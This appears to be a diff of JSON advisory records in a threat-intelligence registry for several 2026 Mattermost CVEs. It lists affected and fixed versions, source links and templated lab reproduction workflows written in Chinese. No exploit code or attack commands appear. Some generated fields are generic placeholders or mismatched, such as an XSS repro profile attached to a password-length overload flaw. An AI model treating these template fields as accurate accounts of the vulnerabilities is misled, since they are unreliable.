"mattermost--repo--github-com-mattermost-mattermost-server--8-0-0-20260130144323-5bb5261c72fa",
"mattermost--repo--github-com-mattermost-mattermost-server--5-3-2-0-20260130144323-5bb5261c72fa",
"mattermost--repo--github-com-mattermost-mattermost-server--10-11-11",
"mattermost--repo--github-com-mattermost-mattermost-server--11-2-3",
"mattermost--repo--github-com-mattermost-mattermost-server--11-3-1",
"mattermost--repo--github-com-mattermost-mattermost-server--10-11-11-incompatible",
"mattermost--repo--github-com-mattermost-mattermost-server--11-2-3-incompatible",
"mattermost--repo--github-com-mattermost-mattermost-server--11-3-1-incompatible"
],
"patched_version_refs": [
"mattermost--repo--github-com-mattermost-mattermost-server--8-0-0-20260130144323-5bb5261c72fa"
],
"version_sync_confidence": "high",
"advisory_scope": "repo",
"version_confidence": "high",
"version_gap_reason": "",
"version_resolution_needed": false,
"workflow": {
"workflow_id": "mattermost--CVE-2026-21386--workflow",
"vuln_family": "unknown",
"entry_surface": "repo-surface",
"preconditions": [
"\u4ec5\u5728 lab-local\u3001lab-public \u6216\u660e\u786e\u6388\u6743\u76ee\u6807\u4e2d\u6267\u884c\u3002",
"\u786e\u8ba4\u76ee\u6807\u547d\u4e2d\u7248\u672c\u65ad\u8a00: introduced=0, fixed<8.0.0-20260130144323-5bb5261c72fa, introduced=0, fixed<5.3.2-0.20260130144323-5bb5261c72fa, introduced=10.11.0-rc1, fixed<10.11.11",
"\u82e5\u5bf9\u8c61\u5c5e\u4e8e `repo`\uff0c\u5148\u786e\u8ba4\u6269\u5c55/\u4ed3\u5e93/\u5305\u5df2\u542f\u7528\u5e76\u5904\u4e8e\u53d7\u5f71\u54cd\u7248\u672c\u3002"
],
"required_role": "unknown",
"affected_version_assertion": [
"introduced=0, fixed<8.0.0-20260130144323-5bb5261c72fa",
"introduced=0, fixed<5.3.2-0.20260130144323-5bb5261c72fa",
"introduced=10.11.0-rc1, fixed<10.11.11",
"introduced=11.2.0-rc1, fixed<11.2.3",
"introduced=11.3.0-rc1, fixed<11.3.1",
"introduced=10.11.0-rc1+incompatible, fixed<10.11.11+incompatible",
"introduced=0"
],
"trigger_vector": "\u5bf9 `unknown` \u5bb6\u65cf\u5165\u53e3\u6295\u9012\u6700\u5c0f\u5316\u3001\u53ef\u5ba1\u8ba1\u3001\u53ef\u56de\u6eda\u7684\u53d7\u63a7\u8f93\u5165\uff0c\u6bd4\u8f83\u4fee\u590d\u524d\u540e\u5dee\u5f02\u3002",
"request_or_ui_path": [
"/repo"
],
"input_shape": "\u63d0\u4ea4\u6700\u5c0f\u5316\u3001\u53ef\u5ba1\u8ba1\u3001\u53ef\u56de\u6eda\u7684\u53d7\u63a7\u8f93\u5165\u3002",
"expected_unsafe_behavior": "\u76ee\u6807\u8868\u73b0\u51fa\u8d85\u51fa\u8bbe\u8ba1\u8fb9\u754c\u7684\u884c\u4e3a\u3002",
"server_evidence_points": [
"\u5e94\u7528\u65e5\u5fd7\u4e2d\u7684\u547d\u4e2d\u8def\u5f84\u3001\u9274\u6743\u51b3\u7b56\u548c\u5f02\u5e38\u6808",
"\u53cd\u5411\u4ee3\u7406\u6216\u8fb9\u754c\u5c42\u65e5\u5fd7\u4e2d\u7684\u8bf7\u6c42\u5934\u3001\u6765\u6e90 IP \u4e0e\u8def\u7531\u51b3\u7b56"
],
"browser_evidence_points": [
"\u57fa\u7ebf\u622a\u56fe\u4e0e\u653b\u51fb\u540e\u622a\u56fe\u7684 DOM/\u89c6\u89c9\u5dee\u5f02",
"console\u3001network \u4e0e response metadata \u4e2d\u7684\u5f02\u5e38\u4fe1\u53f7"
],
"db_or_fs_evidence_points": [
"\u6570\u636e\u5e93\u4e2d\u65b0\u589e/\u8d8a\u6743\u8bfb\u53d6\u7684\u6d4b\u8bd5\u6570\u636e",
"\u6587\u4ef6\u7cfb\u7edf\u4e2d\u65b0\u589e\u4e0a\u4f20\u6837\u672c\u3001\u7f13\u5b58\u6761\u76ee\u6216\u8d8a\u6743\u8bfb\u53d6\u75d5\u8ff9"
],
"detection_signals": [
"WAF / reverse proxy \u5f02\u5e38\u65e5\u5fd7\u3001\u8bbf\u95ee\u65e5\u5fd7\u548c\u544a\u8b66",
"\u5e94\u7528\u5ba1\u8ba1\u65e5\u5fd7\u4e2d\u7684\u6743\u9650\u9519\u8bef\u3001\u91cd\u5b9a\u5411\u5f02\u5e38\u3001\u6a21\u677f\u6e32\u67d3\u6216\u4e0a\u4f20\u843d\u76d8\u4e8b\u4ef6"
],
"mitigation_summary": "\u4f18\u5148\u5347\u7ea7\u5230\u4fee\u590d\u7248\u672c\uff0c\u5e76\u540c\u65f6\u6536\u7d27\u8f93\u5165\u6821\u9a8c\u3001\u670d\u52a1\u7aef\u9274\u6743\u3001\u4ee3\u7406\u4fe1\u4efb\u8fb9\u754c\u3001\u6269\u5c55\u5b89\u88c5\u4fe1\u4efb\u548c\u5ba1\u8ba1\u65e5\u5fd7\u3002",
"patch_validation_steps": [
"\u786e\u8ba4\u76ee\u6807\u7248\u672c\u4ece `introduced=0, fixed<8.0.0-20260130144323-5bb5261c72fa, introduced=0, fixed<5.3.2-0.20260130144323-5bb5261c72fa, introduced=10.11.0-rc1, fixed<10.11.11` \u5347\u7ea7\u6216\u56de\u79fb\u5230 `8.0.0-20260130144323-5bb5261c72fa`\u3002",
"\u4fdd\u7559\u540c\u4e00\u7ec4\u53d7\u63a7\u8f93\u5165\uff0c\u5728\u4fee\u590d\u524d\u540e\u5206\u522b\u6267\u884c\u5e76\u6bd4\u5bf9\u54cd\u5e94\u3001\u65e5\u5fd7\u4e0e\u6d4f\u89c8\u5668\u8bc1\u636e\u3002",
"\u786e\u8ba4\u4fee\u590d\u540e\u4ec5\u4fdd\u7559\u9884\u671f\u4e1a\u52a1\u884c\u4e3a\uff0c\u4e0d\u518d\u89e6\u53d1\u8d8a\u6743\u3001\u56de\u663e\u3001\u5f02\u5e38\u6e32\u67d3\u6216\u9519\u8bef\u8bf7\u6c42\u3002",
"\u8865\u5145 `unknown` \u65cf\u81ea\u52a8\u5316\u56de\u5f52\uff0c\u907f\u514d\u540c\u7c7b\u8def\u5f84\u5728\u63d2\u4ef6\u3001\u4e3b\u9898\u6216\u4ee3\u7406\u94fe\u4e2d\u56de\u5f52\u3002"
],
"lab_safety_notes": [
"\u53ea\u4f7f\u7528\u56de\u73af\u5730\u5740\u3001\u54e8\u5175\u76ee\u6807\u3001\u65e0\u5bb3\u6837\u672c\u6216\u53ef\u56de\u6eda\u6d4b\u8bd5\u6570\u636e\u3002",
"\u7981\u6b62\u9020\u6210\u6301\u4e45\u7834\u574f\u3001\u8d8a\u6743\u4e0b\u8f7d\u771f\u5b9e\u6570\u636e\u6216\u4e0d\u53ef\u56de\u6eda side effect\u3002",
"\u5982\u9700\u6d4f\u89c8\u5668\u8bc1\u636e\uff0c\u4fdd\u7559 baseline / proof \u4e24\u4efd\u5feb\u7167\u4ee5\u53ca console / network \u8bb0\u5f55\u3002"
],
"review_state": "ready"
},
"verification_status": "triage-manual",
"verification_mode": "synthetic",
"last_verified_at": null,
"last_run_id": null,
"evidence_bundle": null,
"historical_status": null,
"latest_status": null,
"browser_evidence": {
"required": false,
"present": false,
"refs": []
},
"repro_profile_id": "xss-generic",
"artifact_mode": "synthetic",
"blocked_reason": null,
"metadata": {
"source_names": [
"OSV Mattermost"
],
"source_kinds": [
"osv-batch"
],
"candidate_count": 2,
"entity_ref_count": 2,
"advisory_scope": "repo",
"version_confidence": "high",
"workflow_id": "mattermost--CVE-2026-21386--workflow"
}
}

61
08-threat-intel/registry/advisories/mattermost--CVE-2026-22545.json
查看文件

@@ -7,19 +7,21 @@
"title": "Mattermost fails to validate user's authentication method when processing account auth type switch",
"summary": "Mattermost versions 10.11.x <= 10.11.10 fail to validate user's authentication method when processing account auth type switch which allows an authenticated attacker to change account password without confirmation via falsely claiming a different auth provider.. Mattermost Advisory ID: MMSA-2026-00583",
"published_at": "2026-03-16T15:30:47Z",
"updated_at": "2026-03-19T19:31:20.982512Z",
"updated_at": "2026-03-23T18:56:23.696710Z",
"severity": "low",
"cvss_score": 3.1,
"exploit_status": "unknown",
"source_confidence": "ecosystem-authority",
"official_source_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-22545",
"secondary_source_urls": [
"https://github.com/advisories/GHSA-rv67-7w2g-7976",
"https://github.com/mattermost/mattermost/commit/ced9a56e3988fe9fd4559d45f9971dbd562e2218",
"https://github.com/mattermost/mattermost",
"https://mattermost.com/security-updates"
],
"aliases": [
"CVE-2026-22545",
"GO-2026-4786",
"GHSA-rv67-7w2g-7976"
],
"cve_ids": [
@@ -29,21 +31,27 @@
"GHSA-rv67-7w2g-7976"
],
"osv_ids": [
"GHSA-rv67-7w2g-7976"
"GHSA-rv67-7w2g-7976",
"GO-2026-4786"
],
"affected_versions": [
"introduced=0, fixed<8.0.0-20260127144908-ced9a56e3988",
"introduced=0, fixed<5.3.2-0.20260127144908-ced9a56e3988",
"introduced=10.11.0-rc1, fixed<10.11.11",
"introduced=11.2.0-rc1, fixed<11.2.3",
"introduced=11.3.0-rc1, fixed<11.3.1"
"introduced=11.3.0-rc1, fixed<11.3.1",
"introduced=10.11.0-rc1+incompatible, fixed<10.11.11+incompatible",
"introduced=0"
],
"fixed_versions": [
"8.0.0-20260127144908-ced9a56e3988",
"5.3.2-0.20260127144908-ced9a56e3988",
"10.11.11",
"11.2.3",
"11.3.1"
"11.3.1",
"10.11.11+incompatible",
"11.2.3+incompatible",
"11.3.1+incompatible"
],
"package_name": "github.com/mattermost/mattermost-server",
"render_markdown": true,
@@ -86,19 +94,25 @@
"introduced=0, fixed<5.3.2-0.20260127144908-ced9a56e3988",
"introduced=10.11.0-rc1, fixed<10.11.11",
"introduced=11.2.0-rc1, fixed<11.2.3",
"introduced=11.3.0-rc1, fixed<11.3.1"
"introduced=11.3.0-rc1, fixed<11.3.1",
"introduced=10.11.0-rc1+incompatible, fixed<10.11.11+incompatible",
"introduced=0"
],
"fixed_version_ranges": [
"8.0.0-20260127144908-ced9a56e3988",
"5.3.2-0.20260127144908-ced9a56e3988",
"10.11.11",
"11.2.3",
"11.3.1"
"11.3.1",
"10.11.11+incompatible",
"11.2.3+incompatible",
"11.3.1+incompatible"
],
"introduced_version": "introduced=11.3.0-rc1, fixed<11.3.1",
"introduced_version": "introduced=0",
"patched_version": "8.0.0-20260127144908-ced9a56e3988",
"version_evidence_sources": [
"https://nvd.nist.gov/vuln/detail/CVE-2026-22545",
"https://github.com/advisories/GHSA-rv67-7w2g-7976",
"https://github.com/mattermost/mattermost/commit/ced9a56e3988fe9fd4559d45f9971dbd562e2218",
"https://github.com/mattermost/mattermost",
"https://mattermost.com/security-updates"
@@ -108,14 +122,19 @@
"mattermost--repo--github-com-mattermost-mattermost-server--introduced-0-fixed-5-3-2-0-20260127144908-ced9a56e3988",
"mattermost--repo--github-com-mattermost-mattermost-server--introduced-10-11-0-rc1-fixed-10-11-11",
"mattermost--repo--github-com-mattermost-mattermost-server--introduced-11-2-0-rc1-fixed-11-2-3",
"mattermost--repo--github-com-mattermost-mattermost-server--introduced-11-3-0-rc1-fixed-11-3-1"
"mattermost--repo--github-com-mattermost-mattermost-server--introduced-11-3-0-rc1-fixed-11-3-1",
"mattermost--repo--github-com-mattermost-mattermost-server--introduced-10-11-0-rc1-incompatible-fixed-10-11-11-incompatible",
"mattermost--repo--github-com-mattermost-mattermost-server--introduced-0"
],
"fixed_version_refs": [
"mattermost--repo--github-com-mattermost-mattermost-server--8-0-0-20260127144908-ced9a56e3988",
"mattermost--repo--github-com-mattermost-mattermost-server--5-3-2-0-20260127144908-ced9a56e3988",
"mattermost--repo--github-com-mattermost-mattermost-server--10-11-11",
"mattermost--repo--github-com-mattermost-mattermost-server--11-2-3",
"mattermost--repo--github-com-mattermost-mattermost-server--11-3-1"
"mattermost--repo--github-com-mattermost-mattermost-server--11-3-1",
"mattermost--repo--github-com-mattermost-mattermost-server--10-11-11-incompatible",
"mattermost--repo--github-com-mattermost-mattermost-server--11-2-3-incompatible",
"mattermost--repo--github-com-mattermost-mattermost-server--11-3-1-incompatible"
],
"patched_version_refs": [
"mattermost--repo--github-com-mattermost-mattermost-server--8-0-0-20260127144908-ced9a56e3988"
@@ -127,29 +146,29 @@
"version_resolution_needed": false,
"workflow": {
"workflow_id": "mattermost--CVE-2026-22545--workflow",
"vuln_family": "xss",
"entry_surface": "web-ui-render-path",
"vuln_family": "unknown",
"entry_surface": "repo-surface",
"preconditions": [
"\u4ec5\u5728 lab-local\u3001lab-public \u6216\u660e\u786e\u6388\u6743\u76ee\u6807\u4e2d\u6267\u884c\u3002",
"\u786e\u8ba4\u76ee\u6807\u547d\u4e2d\u7248\u672c\u65ad\u8a00: introduced=0, fixed<8.0.0-20260127144908-ced9a56e3988, introduced=0, fixed<5.3.2-0.20260127144908-ced9a56e3988, introduced=10.11.0-rc1, fixed<10.11.11",
"\u82e5\u5bf9\u8c61\u5c5e\u4e8e `repo`\uff0c\u5148\u786e\u8ba4\u6269\u5c55/\u4ed3\u5e93/\u5305\u5df2\u542f\u7528\u5e76\u5904\u4e8e\u53d7\u5f71\u54cd\u7248\u672c\u3002"
],
"required_role": "editor-or-admin",
"required_role": "unknown",
"affected_version_assertion": [
"introduced=0, fixed<8.0.0-20260127144908-ced9a56e3988",
"introduced=0, fixed<5.3.2-0.20260127144908-ced9a56e3988",
"introduced=10.11.0-rc1, fixed<10.11.11",
"introduced=11.2.0-rc1, fixed<11.2.3",
"introduced=11.3.0-rc1, fixed<11.3.1"
"introduced=11.3.0-rc1, fixed<11.3.1",
"introduced=10.11.0-rc1+incompatible, fixed<10.11.11+incompatible",
"introduced=0"
],
"trigger_vector": "\u5bf9 `xss` \u5bb6\u65cf\u5165\u53e3\u6295\u9012\u6700\u5c0f\u5316\u3001\u53ef\u5ba1\u8ba1\u3001\u53ef\u56de\u6eda\u7684\u53d7\u63a7\u8f93\u5165\uff0c\u6bd4\u8f83\u4fee\u590d\u524d\u540e\u5dee\u5f02\u3002",
"trigger_vector": "\u5bf9 `unknown` \u5bb6\u65cf\u5165\u53e3\u6295\u9012\u6700\u5c0f\u5316\u3001\u53ef\u5ba1\u8ba1\u3001\u53ef\u56de\u6eda\u7684\u53d7\u63a7\u8f93\u5165\uff0c\u6bd4\u8f83\u4fee\u590d\u524d\u540e\u5dee\u5f02\u3002",
"request_or_ui_path": [
"/admin/editor",
"/preview",
"/rendered-content"
"/repo"
],
"input_shape": "\u53d7\u63a7 HTML/Markdown/\u5bcc\u6587\u672c\u8f93\u5165\uff0c\u89c2\u5bdf\u6e32\u67d3\u4e0a\u4e0b\u6587\u662f\u5426\u5931\u53bb\u7f16\u7801\u6216\u51c0\u5316\u3002",
"expected_unsafe_behavior": "\u8f93\u5165\u5728\u76ee\u6807\u4e0a\u4e0b\u6587\u6267\u884c\u6216\u88ab\u6d4f\u89c8\u5668\u89e3\u91ca\u4e3a\u4e3b\u52a8\u5185\u5bb9\u3002",
"input_shape": "\u63d0\u4ea4\u6700\u5c0f\u5316\u3001\u53ef\u5ba1\u8ba1\u3001\u53ef\u56de\u6eda\u7684\u53d7\u63a7\u8f93\u5165\u3002",
"expected_unsafe_behavior": "\u76ee\u6807\u8868\u73b0\u51fa\u8d85\u51fa\u8bbe\u8ba1\u8fb9\u754c\u7684\u884c\u4e3a\u3002",
"server_evidence_points": [
"\u5e94\u7528\u65e5\u5fd7\u4e2d\u7684\u547d\u4e2d\u8def\u5f84\u3001\u9274\u6743\u51b3\u7b56\u548c\u5f02\u5e38\u6808",
"\u53cd\u5411\u4ee3\u7406\u6216\u8fb9\u754c\u5c42\u65e5\u5fd7\u4e2d\u7684\u8bf7\u6c42\u5934\u3001\u6765\u6e90 IP \u4e0e\u8def\u7531\u51b3\u7b56"
@@ -171,7 +190,7 @@
"\u786e\u8ba4\u76ee\u6807\u7248\u672c\u4ece `introduced=0, fixed<8.0.0-20260127144908-ced9a56e3988, introduced=0, fixed<5.3.2-0.20260127144908-ced9a56e3988, introduced=10.11.0-rc1, fixed<10.11.11` \u5347\u7ea7\u6216\u56de\u79fb\u5230 `8.0.0-20260127144908-ced9a56e3988`\u3002",
"\u4fdd\u7559\u540c\u4e00\u7ec4\u53d7\u63a7\u8f93\u5165\uff0c\u5728\u4fee\u590d\u524d\u540e\u5206\u522b\u6267\u884c\u5e76\u6bd4\u5bf9\u54cd\u5e94\u3001\u65e5\u5fd7\u4e0e\u6d4f\u89c8\u5668\u8bc1\u636e\u3002",
"\u786e\u8ba4\u4fee\u590d\u540e\u4ec5\u4fdd\u7559\u9884\u671f\u4e1a\u52a1\u884c\u4e3a\uff0c\u4e0d\u518d\u89e6\u53d1\u8d8a\u6743\u3001\u56de\u663e\u3001\u5f02\u5e38\u6e32\u67d3\u6216\u9519\u8bef\u8bf7\u6c42\u3002",
"\u8865\u5145 `xss` \u65cf\u81ea\u52a8\u5316\u56de\u5f52\uff0c\u907f\u514d\u540c\u7c7b\u8def\u5f84\u5728\u63d2\u4ef6\u3001\u4e3b\u9898\u6216\u4ee3\u7406\u94fe\u4e2d\u56de\u5f52\u3002"
"\u8865\u5145 `unknown` \u65cf\u81ea\u52a8\u5316\u56de\u5f52\uff0c\u907f\u514d\u540c\u7c7b\u8def\u5f84\u5728\u63d2\u4ef6\u3001\u4e3b\u9898\u6216\u4ee3\u7406\u94fe\u4e2d\u56de\u5f52\u3002"
],
"lab_safety_notes": [
"\u53ea\u4f7f\u7528\u56de\u73af\u5730\u5740\u3001\u54e8\u5175\u76ee\u6807\u3001\u65e0\u5bb3\u6837\u672c\u6216\u53ef\u56de\u6eda\u6d4b\u8bd5\u6570\u636e\u3002",
@@ -202,7 +221,7 @@
"source_kinds": [
"osv-batch"
],
"candidate_count": 1,
"candidate_count": 2,
"entity_ref_count": 2,
"advisory_scope": "repo",
"version_confidence": "high",

230
08-threat-intel/registry/advisories/mattermost--CVE-2026-24458.json 普通文件
查看文件

@@ -0,0 +1,230 @@
{
"canonical_id": "mattermost--CVE-2026-24458",
"system_id": "mattermost",
"display_name": "Mattermost",
"category": "platforms",
"advisory_mode": "core",
"title": "Mattermost fails to properly handle very long passwords",
"summary": "Mattermost versions 11.3.x <= 11.3.0, 11.2.x <= 11.2.2, 10.11.x <= 10.11.10 fail to properly handle very long passwords, which allows an attacker to overload the server CPU and memory via executing login attempts with multi-megabyte passwords. Mattermost Advisory ID: MMSA-2026-00587",
"published_at": "2026-03-16T15:30:42Z",
"updated_at": "2026-03-23T18:56:03.732922Z",
"severity": "low",
"cvss_score": 3.1,
"exploit_status": "unknown",
"source_confidence": "ecosystem-authority",
"official_source_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-24458",
"secondary_source_urls": [
"https://github.com/advisories/GHSA-m5rv-56xx-hfc6",
"https://github.com/mattermost/mattermost/commit/7201f42d955f1bc44719b862132546626b60a180",
"https://github.com/mattermost/mattermost",
"https://mattermost.com/security-updates"
],
"aliases": [
"CVE-2026-24458",
"GO-2026-4731",
"GHSA-m5rv-56xx-hfc6"
],
"cve_ids": [
"CVE-2026-24458"
],
"ghsa_ids": [
"GHSA-m5rv-56xx-hfc6"
],
"osv_ids": [
"GHSA-m5rv-56xx-hfc6",
"GO-2026-4731"
],
"affected_versions": [
"introduced=0, fixed<8.0.0-20260129164748-7201f42d955f",
"introduced=0, fixed<5.3.2-0.20260129164748-7201f42d955f",
"introduced=10.11.0-rc1, fixed<10.11.11",
"introduced=11.2.0-rc1, fixed<11.2.3",
"introduced=11.3.0-rc1, fixed<11.3.1",
"introduced=10.11.0-rc1+incompatible, fixed<10.11.11+incompatible",
"introduced=0"
],
"fixed_versions": [
"8.0.0-20260129164748-7201f42d955f",
"5.3.2-0.20260129164748-7201f42d955f",
"10.11.11",
"11.2.3",
"11.3.1",
"10.11.11+incompatible",
"11.2.3+incompatible",
"11.3.1+incompatible"
],
"package_name": "github.com/mattermost/mattermost-server",
"render_markdown": true,
"case_path": "07-framework-security/platforms/mattermost/cases/mattermost-cve-2026-24458.md",
"secure_code_topics": [
"authz-server-side-recheck",
"xss-output-encoding",
"token-cookie-storage",
"dependency-upgrade-policy"
],
"status": "generated",
"triage_reasons": [],
"entity_refs": [
{
"entity_id": "mattermost",
"entity_type": "system",
"relation": "root-system",
"root_system_id": "mattermost",
"official": true
},
{
"entity_id": "mattermost--repo--github-com-mattermost-mattermost-server",
"entity_type": "repo",
"relation": "affected-component",
"root_system_id": "mattermost",
"official": false
}
],
"affected_components": [
{
"name": "mattermost / mattermost-server",
"entity_id": "mattermost--repo--github-com-mattermost-mattermost-server",
"scope": "repo",
"package_name": "github.com/mattermost/mattermost-server",
"official": false
}
],
"affected_version_ranges": [
"introduced=0, fixed<8.0.0-20260129164748-7201f42d955f",
"introduced=0, fixed<5.3.2-0.20260129164748-7201f42d955f",
"introduced=10.11.0-rc1, fixed<10.11.11",
"introduced=11.2.0-rc1, fixed<11.2.3",
"introduced=11.3.0-rc1, fixed<11.3.1",
"introduced=10.11.0-rc1+incompatible, fixed<10.11.11+incompatible",
"introduced=0"
],
"fixed_version_ranges": [
"8.0.0-20260129164748-7201f42d955f",
"5.3.2-0.20260129164748-7201f42d955f",
"10.11.11",
"11.2.3",
"11.3.1",
"10.11.11+incompatible",
"11.2.3+incompatible",
"11.3.1+incompatible"
],
"introduced_version": "introduced=0",
"patched_version": "8.0.0-20260129164748-7201f42d955f",
"version_evidence_sources": [
"https://nvd.nist.gov/vuln/detail/CVE-2026-24458",
"https://github.com/advisories/GHSA-m5rv-56xx-hfc6",
"https://github.com/mattermost/mattermost/commit/7201f42d955f1bc44719b862132546626b60a180",
"https://github.com/mattermost/mattermost",
"https://mattermost.com/security-updates"
],
"affected_version_refs": [
"mattermost--repo--github-com-mattermost-mattermost-server--introduced-0-fixed-8-0-0-20260129164748-7201f42d955f",
"mattermost--repo--github-com-mattermost-mattermost-server--introduced-0-fixed-5-3-2-0-20260129164748-7201f42d955f",
"mattermost--repo--github-com-mattermost-mattermost-server--introduced-10-11-0-rc1-fixed-10-11-11",
"mattermost--repo--github-com-mattermost-mattermost-server--introduced-11-2-0-rc1-fixed-11-2-3",
"mattermost--repo--github-com-mattermost-mattermost-server--introduced-11-3-0-rc1-fixed-11-3-1",
"mattermost--repo--github-com-mattermost-mattermost-server--introduced-10-11-0-rc1-incompatible-fixed-10-11-11-incompatible",
"mattermost--repo--github-com-mattermost-mattermost-server--introduced-0"
],
"fixed_version_refs": [
"mattermost--repo--github-com-mattermost-mattermost-server--8-0-0-20260129164748-7201f42d955f",
"mattermost--repo--github-com-mattermost-mattermost-server--5-3-2-0-20260129164748-7201f42d955f",
"mattermost--repo--github-com-mattermost-mattermost-server--10-11-11",
"mattermost--repo--github-com-mattermost-mattermost-server--11-2-3",
"mattermost--repo--github-com-mattermost-mattermost-server--11-3-1",
"mattermost--repo--github-com-mattermost-mattermost-server--10-11-11-incompatible",
"mattermost--repo--github-com-mattermost-mattermost-server--11-2-3-incompatible",
"mattermost--repo--github-com-mattermost-mattermost-server--11-3-1-incompatible"
],
"patched_version_refs": [
"mattermost--repo--github-com-mattermost-mattermost-server--8-0-0-20260129164748-7201f42d955f"
],
"version_sync_confidence": "high",
"advisory_scope": "repo",
"version_confidence": "high",
"version_gap_reason": "",
"version_resolution_needed": false,
"workflow": {
"workflow_id": "mattermost--CVE-2026-24458--workflow",
"vuln_family": "unknown",
"entry_surface": "repo-surface",
"preconditions": [
"\u4ec5\u5728 lab-local\u3001lab-public \u6216\u660e\u786e\u6388\u6743\u76ee\u6807\u4e2d\u6267\u884c\u3002",
"\u786e\u8ba4\u76ee\u6807\u547d\u4e2d\u7248\u672c\u65ad\u8a00: introduced=0, fixed<8.0.0-20260129164748-7201f42d955f, introduced=0, fixed<5.3.2-0.20260129164748-7201f42d955f, introduced=10.11.0-rc1, fixed<10.11.11",
"\u82e5\u5bf9\u8c61\u5c5e\u4e8e `repo`\uff0c\u5148\u786e\u8ba4\u6269\u5c55/\u4ed3\u5e93/\u5305\u5df2\u542f\u7528\u5e76\u5904\u4e8e\u53d7\u5f71\u54cd\u7248\u672c\u3002"
],
"required_role": "unknown",
"affected_version_assertion": [
"introduced=0, fixed<8.0.0-20260129164748-7201f42d955f",
"introduced=0, fixed<5.3.2-0.20260129164748-7201f42d955f",
"introduced=10.11.0-rc1, fixed<10.11.11",
"introduced=11.2.0-rc1, fixed<11.2.3",
"introduced=11.3.0-rc1, fixed<11.3.1",
"introduced=10.11.0-rc1+incompatible, fixed<10.11.11+incompatible",
"introduced=0"
],
"trigger_vector": "\u5bf9 `unknown` \u5bb6\u65cf\u5165\u53e3\u6295\u9012\u6700\u5c0f\u5316\u3001\u53ef\u5ba1\u8ba1\u3001\u53ef\u56de\u6eda\u7684\u53d7\u63a7\u8f93\u5165\uff0c\u6bd4\u8f83\u4fee\u590d\u524d\u540e\u5dee\u5f02\u3002",
"request_or_ui_path": [
"/repo"
],
"input_shape": "\u63d0\u4ea4\u6700\u5c0f\u5316\u3001\u53ef\u5ba1\u8ba1\u3001\u53ef\u56de\u6eda\u7684\u53d7\u63a7\u8f93\u5165\u3002",
"expected_unsafe_behavior": "\u76ee\u6807\u8868\u73b0\u51fa\u8d85\u51fa\u8bbe\u8ba1\u8fb9\u754c\u7684\u884c\u4e3a\u3002",
"server_evidence_points": [
"\u5e94\u7528\u65e5\u5fd7\u4e2d\u7684\u547d\u4e2d\u8def\u5f84\u3001\u9274\u6743\u51b3\u7b56\u548c\u5f02\u5e38\u6808",
"\u53cd\u5411\u4ee3\u7406\u6216\u8fb9\u754c\u5c42\u65e5\u5fd7\u4e2d\u7684\u8bf7\u6c42\u5934\u3001\u6765\u6e90 IP \u4e0e\u8def\u7531\u51b3\u7b56"
],
"browser_evidence_points": [
"\u57fa\u7ebf\u622a\u56fe\u4e0e\u653b\u51fb\u540e\u622a\u56fe\u7684 DOM/\u89c6\u89c9\u5dee\u5f02",
"console\u3001network \u4e0e response metadata \u4e2d\u7684\u5f02\u5e38\u4fe1\u53f7"
],
"db_or_fs_evidence_points": [
"\u6570\u636e\u5e93\u4e2d\u65b0\u589e/\u8d8a\u6743\u8bfb\u53d6\u7684\u6d4b\u8bd5\u6570\u636e",
"\u6587\u4ef6\u7cfb\u7edf\u4e2d\u65b0\u589e\u4e0a\u4f20\u6837\u672c\u3001\u7f13\u5b58\u6761\u76ee\u6216\u8d8a\u6743\u8bfb\u53d6\u75d5\u8ff9"
],
"detection_signals": [
"WAF / reverse proxy \u5f02\u5e38\u65e5\u5fd7\u3001\u8bbf\u95ee\u65e5\u5fd7\u548c\u544a\u8b66",
"\u5e94\u7528\u5ba1\u8ba1\u65e5\u5fd7\u4e2d\u7684\u6743\u9650\u9519\u8bef\u3001\u91cd\u5b9a\u5411\u5f02\u5e38\u3001\u6a21\u677f\u6e32\u67d3\u6216\u4e0a\u4f20\u843d\u76d8\u4e8b\u4ef6"
],
"mitigation_summary": "\u4f18\u5148\u5347\u7ea7\u5230\u4fee\u590d\u7248\u672c\uff0c\u5e76\u540c\u65f6\u6536\u7d27\u8f93\u5165\u6821\u9a8c\u3001\u670d\u52a1\u7aef\u9274\u6743\u3001\u4ee3\u7406\u4fe1\u4efb\u8fb9\u754c\u3001\u6269\u5c55\u5b89\u88c5\u4fe1\u4efb\u548c\u5ba1\u8ba1\u65e5\u5fd7\u3002",
"patch_validation_steps": [
"\u786e\u8ba4\u76ee\u6807\u7248\u672c\u4ece `introduced=0, fixed<8.0.0-20260129164748-7201f42d955f, introduced=0, fixed<5.3.2-0.20260129164748-7201f42d955f, introduced=10.11.0-rc1, fixed<10.11.11` \u5347\u7ea7\u6216\u56de\u79fb\u5230 `8.0.0-20260129164748-7201f42d955f`\u3002",
"\u4fdd\u7559\u540c\u4e00\u7ec4\u53d7\u63a7\u8f93\u5165\uff0c\u5728\u4fee\u590d\u524d\u540e\u5206\u522b\u6267\u884c\u5e76\u6bd4\u5bf9\u54cd\u5e94\u3001\u65e5\u5fd7\u4e0e\u6d4f\u89c8\u5668\u8bc1\u636e\u3002",
"\u786e\u8ba4\u4fee\u590d\u540e\u4ec5\u4fdd\u7559\u9884\u671f\u4e1a\u52a1\u884c\u4e3a\uff0c\u4e0d\u518d\u89e6\u53d1\u8d8a\u6743\u3001\u56de\u663e\u3001\u5f02\u5e38\u6e32\u67d3\u6216\u9519\u8bef\u8bf7\u6c42\u3002",
"\u8865\u5145 `unknown` \u65cf\u81ea\u52a8\u5316\u56de\u5f52\uff0c\u907f\u514d\u540c\u7c7b\u8def\u5f84\u5728\u63d2\u4ef6\u3001\u4e3b\u9898\u6216\u4ee3\u7406\u94fe\u4e2d\u56de\u5f52\u3002"
],
"lab_safety_notes": [
"\u53ea\u4f7f\u7528\u56de\u73af\u5730\u5740\u3001\u54e8\u5175\u76ee\u6807\u3001\u65e0\u5bb3\u6837\u672c\u6216\u53ef\u56de\u6eda\u6d4b\u8bd5\u6570\u636e\u3002",
"\u7981\u6b62\u9020\u6210\u6301\u4e45\u7834\u574f\u3001\u8d8a\u6743\u4e0b\u8f7d\u771f\u5b9e\u6570\u636e\u6216\u4e0d\u53ef\u56de\u6eda side effect\u3002",
"\u5982\u9700\u6d4f\u89c8\u5668\u8bc1\u636e\uff0c\u4fdd\u7559 baseline / proof \u4e24\u4efd\u5feb\u7167\u4ee5\u53ca console / network \u8bb0\u5f55\u3002"
],
"review_state": "ready"
},
"verification_status": "triage-manual",
"verification_mode": "synthetic",
"last_verified_at": null,
"last_run_id": null,
"evidence_bundle": null,
"historical_status": null,
"latest_status": null,
"browser_evidence": {
"required": false,
"present": false,
"refs": []
},
"repro_profile_id": "xss-generic",
"artifact_mode": "synthetic",
